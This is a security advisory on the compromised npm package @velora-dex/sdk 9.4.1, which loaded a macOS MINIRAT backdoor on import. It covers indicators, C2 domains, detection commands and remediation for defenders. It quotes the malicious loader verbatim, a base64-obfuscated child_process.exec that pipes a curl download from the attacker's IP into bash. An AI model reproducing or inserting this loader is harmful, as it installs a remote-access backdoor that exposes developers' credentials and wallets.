@velora-dex/sdk 9.4.1 loaded a macOS MINIRAT backdoor on import

critical

CVE

Not assigned

CWE

CWE-506, CWE-78

Affected Surface

@velora-dex/sdk 9.4.1, Velora DEX SDK consumers importing the npm package on macOS, DeFi and cryptocurrency applications using @velora-dex/sdk, Developer workstations and build runners with npm access to the compromised tarball

Wiz’s 27 May JINX-0164 report connects a broader cryptocurrency-developer intrusion campaign to an earlier npm supply-chain operation against @velora-dex/sdk, the official SDK for the Velora decentralized exchange ecosystem. The compromised release was @velora-dex/sdk@9.4.1, published on 7 April and later removed.

The package-level finding is still important for application security teams because the malicious code did not use a lifecycle script. It executed when application code imported the SDK. That means npm install --ignore-scripts would not stop execution if a test, local app, server-side render, build step, or REPL later loaded the package.

Affected package

Affected:

• @velora-dex/sdk 9.4.1

Clean or remediated:

• @velora-dex/sdk 9.4.0 was the confirmed pre-compromise baseline in public diff reports.
• @velora-dex/sdk 9.4.2 was published roughly three hours after the malicious release and reverted the injected code.
• Current npm metadata in this environment shows latest as 9.5.3.

Observed npm publication timing:

9.4.0: 2026-03-23T13:16:02.405Z
9.4.1: 2026-04-07T19:03:33.087Z
9.4.2: 2026-04-07T22:25:50.515Z

The compromised version is a registry-artifact attack. StepSecurity, SafeDep, and the upstream GitHub issue all report that the source repository did not contain the malicious code. The published tarball changed only package.json and dist/index.js.

Import-time execution

The malicious release prepended three lines to dist/index.js, the package main entrypoint. Wiz reports the decoded command as:

nohup bash -c "$(curl -fsSL http://89.36.224[.]5/troubleshoot/mac/install.sh)" > /dev/null 2>&1

The JavaScript wrapper used child_process.exec() to decode and run that command:

'use strict'

const {exec} = require('child_process');
exec(`echo 'bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx' | (base64 --decode 2>/dev/null || base64 -D) | bash`, function(error, stdout, stderr) {});

The data flow is direct:

application import
  -> dist/index.js main entry
  -> child_process.exec()
  -> base64 decode
  -> curl shell script from 89.36.224[.]5
  -> macOS architecture-specific payload
  -> launchctl persistence

Because the code sits in dist/index.js, any JavaScript runtime that imports the SDK can trigger it:

const { constructSimpleSDK } = require("@velora-dex/sdk");

or:

import { constructSimpleSDK } from "@velora-dex/sdk";

No postinstall, preinstall, or prepare script needs to fire.

MINIRAT payload

Wiz names the second-stage malware MINIRAT, a lightweight Go backdoor compiled for macOS ARM64 and x86_64. It overlaps with JINX-0164’s social-engineering malware infrastructure but is smaller than the full AUDIOFIX stealer.

Reported MINIRAT behavior includes:

• host fingerprinting, username collection, hostname collection, and public-IP lookup through api.ipify.org
• check-in to C2 using the Mac hardware UUID as an identifier
• file upload and download
• compressed file upload
• arbitrary shell-command execution
• persistence through launchctl and a LaunchAgent

Public reporting gives these persistence indicators:

~/Library/Application Support/com.apple.Terminal/profiler
~/Library/LaunchAgents/com.apple.Terminal.profiler.plist
launchctl service: zsh.profiler

Wiz also reports shared C2 domains across MINIRAT and AUDIOFIX:

datahub.ink
cloud-sync.online
byte-io.us

Why this mattered to application teams

@velora-dex/sdk is a DeFi SDK, so its normal consumers include cryptocurrency applications, trading tools, wallet-adjacent services, and developer scripts that may have access to private infrastructure or signing workflows. That is an attractive environment for a macOS backdoor:

• developer machines may hold wallet-extension state, SSH keys, cloud credentials, GitHub tokens, and package-manager credentials
• build systems may hold deploy keys, npm tokens, and exchange or RPC credentials
• application test suites may import the SDK as part of routine CI validation
• incident responders may miss the execution point if they only look for install hooks

JINX-0164’s broader campaign shows the same preference for development infrastructure. Wiz and Infosecurity describe the actor using stolen GitHub tokens to exfiltrate CI/CD secrets and inject malware into internal repositories. The @velora-dex/sdk tarball compromise is the package-registry version of that playbook: compromise the artifact developers already import, then let normal build and runtime behavior execute the implant.

Detection and triage

Search dependency manifests, lockfiles, package caches, and SBOMs for the exact compromised version:

npm ls @velora-dex/sdk
pnpm why @velora-dex/sdk
yarn why @velora-dex/sdk

Then inspect lockfiles for:

@velora-dex/sdk@9.4.1

On macOS systems that may have imported the package, search for persistence and payload artifacts:

launchctl list | grep -E "zsh\\.profiler|com\\.apple\\.Terminal\\.profiler"
test -f "$HOME/Library/LaunchAgents/com.apple.Terminal.profiler.plist"
test -f "$HOME/Library/Application Support/com.apple.Terminal/profiler"

Network logs should be reviewed for:

89.36.224.5
datahub.ink
cloud-sync.online
byte-io.us
api.ipify.org immediately before suspicious C2 check-in

Because the malicious code ran on import, correlate endpoint and CI logs with test execution, local development server startup, server-side rendering, and scripts that import @velora-dex/sdk, not just package installation timestamps.

Remediation

Upgrade away from @velora-dex/sdk@9.4.1 and rebuild from a clean lockfile. If a host imported the compromised version on macOS, treat the host as compromised, remove persistence, and rotate secrets from a known-clean machine.

At minimum, rotate:

• GitHub tokens, deploy keys, and SSH keys
• npm tokens and package-publishing credentials
• cloud provider keys and environment variables
• cryptocurrency wallet or exchange credentials reachable from the host
• CI/CD secrets exposed to jobs that imported the package

For future incidents, scan both source repositories and registry tarballs. The malicious @velora-dex/sdk code was absent from GitHub but present in the npm artifact that applications actually executed.

References

• Wiz: Threat Actor Targets Crypto Organizations
• StepSecurity: @velora-dex/sdk Compromised on npm
• SafeDep: Malicious @velora-dex/sdk Delivers Go RAT via npm
• Infosecurity Magazine: Jinx-0164 targets crypto developers on macOS
• GitHub issue: Package compromised on NPM
• npm package metadata: @velora-dex/sdk
• CWE-506 Embedded Malicious Code
• CWE-78 OS Command Injection